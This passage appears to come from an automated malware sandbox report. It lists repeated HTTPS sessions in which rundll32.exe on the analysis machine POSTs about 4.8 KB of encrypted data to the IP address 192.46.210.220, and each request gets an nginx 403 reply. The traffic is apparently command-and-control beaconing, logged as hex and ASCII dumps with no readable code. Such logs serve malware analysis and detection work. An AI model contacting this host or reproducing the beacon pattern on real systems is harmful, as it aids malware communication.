                                                                                                          2021-10-28 03:10:30 UTC304OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:31 UTC309INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:31 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          62192.168.2.650077192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:31 UTC309OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:31 UTC309OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:32 UTC314INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:32 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          63192.168.2.650083192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:34 UTC314OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:34 UTC314OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:35 UTC319INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:35 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          64192.168.2.650085192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:35 UTC319OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:35 UTC319OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:36 UTC324INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:36 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          65192.168.2.650091192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:38 UTC324OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:38 UTC324OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:38 UTC329INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:38 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          66192.168.2.650093192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:39 UTC329OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:39 UTC329OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:39 UTC334INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:39 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          67192.168.2.650099192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:42 UTC334OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:42 UTC334OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:42 UTC339INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:42 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          68192.168.2.650101192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:43 UTC339OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:43 UTC339OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:43 UTC344INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:43 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          69192.168.2.650107192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:45 UTC344OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:45 UTC344OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:46 UTC349INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:46 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          7192.168.2.649783192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:08:39 UTC34OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:08:39 UTC34OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:08:40 UTC39INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:08:40 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          70192.168.2.650109192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:46 UTC349OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:46 UTC349OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:47 UTC354INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:47 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          71192.168.2.650115192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:49 UTC354OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:49 UTC354OUTData Raw: 26 c4 53 1e 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: &S%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:50 UTC359INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:50 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          72192.168.2.650117192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:50 UTC359OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4850
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
                                                                                                          2021-10-28 03:10:50 UTC359OUTData Raw: 62 66 32 9d 10 0b 25 a3 55 b6 5d a3 48 6c 4e c6 e5 ff 21 fe ac a5 a4 44 50 42 80 98 d9 54 90 4b a4 f1 e7 36 69 55 df b5 c2 fa a1 ea 84 4a 99 de ae e4 28 33 97 5b 4b 4f 0d 29 d8 5b 21 4f 2f a5 6a a6 97 56 12 f3 31 94 5e b8 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                          Data Ascii: bf2%U]HlN!DPBTK6iUJ(3[KO)[!O/jV1^7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                          2021-10-28 03:10:51 UTC364INHTTP/1.1 403 Forbidden
                                                                                                          Server: nginx/1.15.12
                                                                                                          Date: Thu, 28 Oct 2021 03:10:51 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          73192.168.2.650123192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-28 03:10:53 UTC364OUTPOST / HTTP/1.1
                                                                                                          Host: 192.46.210.220
                                                                                                          Content-Length: 4862
                                                                                                          Connection: Close
                                                                                                          Cache-Control: no-cache
